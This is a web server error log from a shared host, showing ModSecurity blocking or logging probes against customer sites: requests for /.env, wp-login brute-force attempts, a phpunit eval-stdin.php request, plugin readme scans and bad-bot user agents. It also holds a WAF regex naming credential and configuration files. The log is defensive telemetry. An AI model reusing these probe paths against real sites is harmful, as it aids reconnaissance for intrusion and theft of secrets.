[Tue May 26 17:55:55.419559 2026] [security2:error] [pid 946381:tid 946589] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRUtiTu5WG4Dm5Wpr15gAAAE4"]
[Tue May 26 17:55:56.122949 2026] [security2:error] [pid 946381:tid 946603] [client 184.154.76.35:41610] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "freshmindsolutions.com"] [uri "/wp-content/plugins/elementor/readme.txt"] [unique_id "ahWRVNiTu5WG4Dm5Wpr19wAAAFw"]
[Tue May 26 17:55:56.123137 2026] [security2:error] [pid 946381:tid 946603] [client 184.154.76.35:41610] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "freshmindsolutions.com"] [uri "/wp-content/plugins/elementor/readme.txt"] [unique_id "ahWRVNiTu5WG4Dm5Wpr19wAAAFw"]
[Tue May 26 17:55:56.800106 2026] [security2:error] [pid 946381:tid 946638] [client 184.154.76.35:0] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWRVNiTu5WG4Dm5Wpr2AAAAAH8"]
[Tue May 26 17:55:56.800150 2026] [security2:error] [pid 946381:tid 946638] [client 184.154.76.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWRVNiTu5WG4Dm5Wpr2AAAAAH8"]
[Tue May 26 17:55:56.937595 2026] [security2:error] [pid 946381:tid 946511] [client 184.154.76.35:41614] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/wp-content/plugins/js_composer/changes.txt"] [unique_id "ahWRVNiTu5WG4Dm5Wpr1_gAAAAA"]
[Tue May 26 17:55:56.957543 2026] [autoindex:error] [pid 946381:tid 946517] [client 205.210.31.74:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:55:57.456064 2026] [security2:error] [pid 946381:tid 946606] [client 142.147.111.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWRVdiTu5WG4Dm5Wpr2EAAAAF8"], referer: https://anujtradingco.com
[Tue May 26 17:55:57.787005 2026] [security2:error] [pid 946381:tid 946551] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRVdiTu5WG4Dm5Wpr2DQAAACg"]
[Tue May 26 17:55:57.887641 2026] [security2:error] [pid 946381:tid 946618] [client 184.154.76.35:0] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWRVdiTu5WG4Dm5Wpr2FQAAABM"]
[Tue May 26 17:55:57.887683 2026] [security2:error] [pid 946381:tid 946618] [client 184.154.76.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahWRVdiTu5WG4Dm5Wpr2FQAAABM"]
[Tue May 26 17:55:58.025444 2026] [security2:error] [pid 946381:tid 946598] [client 184.154.76.35:54166] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "freshmindsolutions.com"] [uri "/wp-content/plugins/revslider/release_log.txt"] [unique_id "ahWRVdiTu5WG4Dm5Wpr2EQAAAFc"]
[Tue May 26 17:55:58.450023 2026] [security2:error] [pid 946381:tid 946559] [client 184.154.76.35:54176] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "freshmindsolutions.com"] [uri "/wp-content/plugins/contact-form-7/readme.txt"] [unique_id "ahWRVtiTu5WG4Dm5Wpr2LAAAADA"]
[Tue May 26 17:55:58.450144 2026] [security2:error] [pid 946381:tid 946559] [client 184.154.76.35:54176] ModSecurity: Warning. Matched phrase "SiteLockSpider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "freshmindsolutions.com"] [uri "/wp-content/plugins/contact-form-7/readme.txt"] [unique_id "ahWRVtiTu5WG4Dm5Wpr2LAAAADA"]
[Tue May 26 17:55:59.919938 2026] [security2:error] [pid 946381:tid 946418] [remote 45.79.189.31:51094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWRV9iTu5WG4Dm5Wpr2RQAABiQ"]
[Tue May 26 17:56:00.278488 2026] [security2:error] [pid 946381:tid 946637] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRV9iTu5WG4Dm5Wpr2SAAAAH4"]
[Tue May 26 17:56:01.813543 2026] [security2:error] [pid 946381:tid 946588] [client 146.174.164.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRWdiTu5WG4Dm5Wpr2aAAAAE0"]
[Tue May 26 17:56:02.719505 2026] [security2:error] [pid 946381:tid 946585] [client 170.199.229.160:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWRWtiTu5WG4Dm5Wpr2hAAAAEo"], referer: http://anujtradingco.com/
[Tue May 26 17:56:03.591668 2026] [security2:error] [pid 946381:tid 946426] [remote 216.73.216.30:46992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWRW9iTu5WG4Dm5Wpr2mgAAAiw"]
[Tue May 26 17:56:03.679815 2026] [security2:error] [pid 946381:tid 946583] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRW9iTu5WG4Dm5Wpr2kwAAAEg"]
[Tue May 26 17:56:05.029355 2026] [security2:error] [pid 946381:tid 946534] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRXNiTu5WG4Dm5Wpr2sgAAABc"]
[Tue May 26 17:56:08.189522 2026] [security2:error] [pid 946381:tid 946591] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRX9iTu5WG4Dm5Wpr27AAAAFA"]
[Tue May 26 17:56:09.234483 2026] [core:crit] [pid 946381:tid 946570] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:56:10.310793 2026] [security2:error] [pid 946381:tid 946541] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRYdiTu5WG4Dm5Wpr3IwAAAB4"]
[Tue May 26 17:56:11.035865 2026] [security2:error] [pid 946381:tid 946581] [client 103.67.163.30:62333] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ucdc.co.in"] [uri "/.env"] [unique_id "ahWRY9iTu5WG4Dm5Wpr3PAAAAEY"]
[Tue May 26 17:56:11.733373 2026] [security2:error] [pid 946381:tid 946564] [client 108.165.47.198:33728] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "moneyapp.com.co"] [uri "/"] [unique_id "ahWRY9iTu5WG4Dm5Wpr3TgAAADU"]
[Tue May 26 17:56:11.820392 2026] [security2:error] [pid 946381:tid 946454] [remote 160.250.186.220:34492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWRY9iTu5WG4Dm5Wpr3SgAAXkg"]
[Tue May 26 17:56:13.357119 2026] [security2:error] [pid 946381:tid 946596] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRZNiTu5WG4Dm5Wpr3ZwAAAFU"]
[Tue May 26 17:56:13.432270 2026] [security2:error] [pid 946381:tid 946460] [remote 216.73.216.30:46992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWRZdiTu5WG4Dm5Wpr3awAAeU4"]
[Tue May 26 17:56:13.784610 2026] [security2:error] [pid 946381:tid 946590] [client 103.67.163.30:57205] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ucdc.co.in"] [uri "/.env"] [unique_id "ahWRZdiTu5WG4Dm5Wpr3bAAAAE8"]
[Tue May 26 17:56:14.314798 2026] [security2:error] [pid 946381:tid 946487] [remote 209.42.18.223:50706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWRZtiTu5WG4Dm5Wpr3eQAARWk"]
[Tue May 26 17:56:15.962079 2026] [security2:error] [pid 946381:tid 946610] [client 103.67.163.30:65236] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "ucdc.co.in"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahWRZ9iTu5WG4Dm5Wpr3oAAAAGM"]
[Tue May 26 17:56:16.066544 2026] [security2:error] [pid 946381:tid 946527] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRZ9iTu5WG4Dm5Wpr3mQAAABA"]
[Tue May 26 17:56:18.618296 2026] [security2:error] [pid 946381:tid 946520] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRatiTu5WG4Dm5Wpr36wAAAAk"]
[Tue May 26 17:56:20.182307 2026] [security2:error] [pid 946381:tid 946413] [remote 123.30.233.13:56322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWRa9iTu5WG4Dm5Wpr4HAAAAR8"]
[Tue May 26 17:56:20.779115 2026] [security2:error] [pid 946381:tid 946416] [remote 123.30.233.13:56322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWRbNiTu5WG4Dm5Wpr4LwAAJCI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 17:56:21.320454 2026] [security2:error] [pid 946381:tid 946514] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRbNiTu5WG4Dm5Wpr4NQAAAAM"]
[Tue May 26 17:56:22.378040 2026] [security2:error] [pid 946381:tid 946422] [remote 91.134.89.60:42894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahWRbtiTu5WG4Dm5Wpr4WAAATSg"]
[Tue May 26 17:56:22.881798 2026] [security2:error] [pid 946381:tid 946432] [remote 74.7.241.58:56710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWRbtiTu5WG4Dm5Wpr4bgAAeTI"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/en
[Tue May 26 17:56:23.237998 2026] [security2:error] [pid 946381:tid 946585] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRbtiTu5WG4Dm5Wpr4bAAAAEo"]
[Tue May 26 17:56:23.322424 2026] [security2:error] [pid 946381:tid 946525] [client 162.243.41.33:54318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.41.243.162.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "staging.unsobered.com"] [uri "/xmlrpc.php"] [unique_id "ahWRb9iTu5WG4Dm5Wpr4egAAAA4"]
[Tue May 26 17:56:23.322552 2026] [security2:error] [pid 946381:tid 946525] [client 162.243.41.33:54318] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "staging.unsobered.com"] [uri "/xmlrpc.php"] [unique_id "ahWRb9iTu5WG4Dm5Wpr4egAAAA4"]
[Tue May 26 17:56:25.167454 2026] [security2:error] [pid 946381:tid 946621] [client 170.199.229.160:44193] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWRcNiTu5WG4Dm5Wpr4qAAAAG4"], referer: https://anujtradingco.com/
[Tue May 26 17:56:26.729335 2026] [security2:error] [pid 946381:tid 946575] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRctiTu5WG4Dm5Wpr40wAAAEA"]
[Tue May 26 17:56:29.146124 2026] [security2:error] [pid 946381:tid 946626] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRdNiTu5WG4Dm5Wpr5EwAAAHM"]
[Tue May 26 17:56:29.603939 2026] [security2:error] [pid 946381:tid 946604] [client 51.77.74.125:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWRc9iTu5WG4Dm5Wpr48wAAAF0"]
[Tue May 26 17:56:30.101196 2026] [security2:error] [pid 946381:tid 946454] [remote 74.7.241.58:39096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWRdtiTu5WG4Dm5Wpr5NwAAYUg"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/de
[Tue May 26 17:56:31.569700 2026] [security2:error] [pid 946381:tid 946626] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRd9iTu5WG4Dm5Wpr5WAAAAHM"]
[Tue May 26 17:56:31.993445 2026] [core:crit] [pid 946381:tid 946608] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:56:32.803896 2026] [security2:error] [pid 946381:tid 946600] [client 162.243.41.33:56536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.41.243.162.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "staging.unsobered.com"] [uri "/xmlrpc.php"] [unique_id "ahWReNiTu5WG4Dm5Wpr5lQAAAFk"]
[Tue May 26 17:56:32.804037 2026] [security2:error] [pid 946381:tid 946600] [client 162.243.41.33:56536] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "staging.unsobered.com"] [uri "/xmlrpc.php"] [unique_id "ahWReNiTu5WG4Dm5Wpr5lQAAAFk"]
[Tue May 26 17:56:33.582790 2026] [security2:error] [pid 946381:tid 946393] [remote 216.73.216.30:19591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/sitemap.xml"] [unique_id "ahWRediTu5WG4Dm5Wpr5rAAAHAs"]
[Tue May 26 17:56:33.805453 2026] [security2:error] [pid 946381:tid 946584] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRediTu5WG4Dm5Wpr5qAAAAEk"]
[Tue May 26 17:56:35.187528 2026] [security2:error] [pid 946381:tid 946540] [client 74.7.241.181:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.kexcouriers.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWRe9iTu5WG4Dm5Wpr51AAAAB0"]
[Tue May 26 17:56:35.188669 2026] [security2:error] [pid 946381:tid 946530] [client 74.7.241.181:49132] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.kexcouriers.com"] [uri "/robots.txt"] [unique_id "ahWRe9iTu5WG4Dm5Wpr50gAAE2U"]
[Tue May 26 17:56:36.545040 2026] [security2:error] [pid 946381:tid 946567] [client 113.184.31.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRfNiTu5WG4Dm5Wpr58QAAADg"]
[Tue May 26 17:56:36.837443 2026] [security2:error] [pid 946381:tid 946585] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRfNiTu5WG4Dm5Wpr5_QAAAEo"]
[Tue May 26 17:56:36.954743 2026] [security2:error] [pid 946381:tid 946485] [remote 103.11.102.106:37070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWRfNiTu5WG4Dm5Wpr6BwAASGc"]
[Tue May 26 17:56:39.329132 2026] [security2:error] [pid 946381:tid 946604] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWRftiTu5WG4Dm5Wpr6NAAAAF0"]
[Tue May 26 17:56:39.561768 2026] [security2:error] [pid 946381:tid 946557] [client 173.239.240.43:23981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahWRf9iTu5WG4Dm5Wpr6RAAAAC4"]
[Tue May 26 17:56:39.974871 2026] [security2:error] [pid 946381:tid 946491] [remote 47.128.117.119:32218] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/features/isotope-grid/page/2/"] [unique_id "ahWRf9iTu5WG4Dm5Wpr6VQAAIm0"]
[Tue May 26 17:56:40.702413 2026] [security2:error] [pid 946381:tid 946499] [remote 47.128.47.144:19460] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cicodev.org"] [uri "/fr/programs-and-campaigns/cross-cutting-programs"] [unique_id "ahWRgNiTu5WG4Dm5Wpr6YQAAHHU"]
